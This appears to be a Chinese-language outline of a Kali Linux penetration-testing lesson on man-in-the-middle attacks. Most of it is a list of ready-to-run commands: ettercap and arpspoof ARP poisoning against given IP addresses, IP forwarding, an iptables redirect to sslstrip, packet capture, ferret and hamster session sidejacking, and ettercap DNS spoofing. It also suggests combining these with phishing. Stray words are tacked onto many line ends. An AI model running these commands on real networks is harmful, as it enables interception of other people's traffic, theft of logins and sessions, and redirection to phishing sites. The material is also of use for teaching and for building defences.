文/玄魂html
目錄linux
Kali Linux Web 滲透測試—第十四課-arp欺騙、嗅探、dns欺騙、session劫持 1session
關於嗅探、arp欺騙、會話劫持.............................................................. 1app
視頻教程地址:http://edu.51cto.com/course/course_id-1887.htmltcp
l 1. googleide
l 2. http://www.cnblogs.com/xuanhun/archive/2009/01/05/1369828.html工具
l http://www.cnblogs.com/xuanhun/archive/2009/04/22/1441274.html測試
l 中間人攻擊(arp欺騙,dns欺騙)ui
l 注射式攻擊google
l 參數說明:http://www.91ri.org/4408.html
l 2.若是你是第一次進行中間人攻擊操做,那麼要對kali下的ettercap作點配置,配置文件是/etc/ettercap/etter.conf
首先你要將ec_uid 、ec_gid都變爲0,而後找到linux分類下的if you use iptables這一行,將註釋(「#」號)去掉,打開轉發。
3./etc/NetworkManager/NetworkManager.conf 修改
4.service network-manager restart
5.echo 1 >> /proc/sys/net/ipv4/ip_forward
6. ettercap -i wlan0 -Tq -M arp:remote /192.168.2.20/ /192.168.2.1/
l echo 1 >> /proc/sys/net/ipv4/ip_forward
l arpspoof -i eth0 -t 192.168.14.2 192.168.14.132
l tcpdump
l wireshark
l drafnet等其餘自動化工具
l iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000(設置)
l iptables -t nat -D PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000(取消)
l sslstrip -p -l 10000 -w log.txt
l tcpdump -i eth0 -w qq.cap
l ferret -r qq.cap
l hamster
l 選擇目標
l 測試session
l dpkg --add-architecture i386
l apt-get clean && apt-get update && apt-get upgrade -y && apt-get dist-upgrade -y
l sudo aptitude install ferret-sidejack:i386
l 1. 使用 ettercap 進行arp欺騙
l 2.修改etter.dns 文件
/etc/ettercap/etter.dns
l 3.啓用dns_spoof
l 結合前面課程中的 set 工具集,咱們在局域網中能作到完美無缺(釣魚和消息轉發相結合)的釣魚攻擊嗎?
l 局域網中的嗅探、釣魚、session劫持、dns欺騙這一類的攻擊的防護方式是什麼?
視頻教程地址:http://edu.51cto.com/course/course_id-1887.html
ps:對此文章感興趣的讀者,能夠加qq羣:Hacking:303242737;Hacking-2羣:147098303;Hacking-3羣:31371755;hacking-4羣:201891680;Hacking-5羣:316885176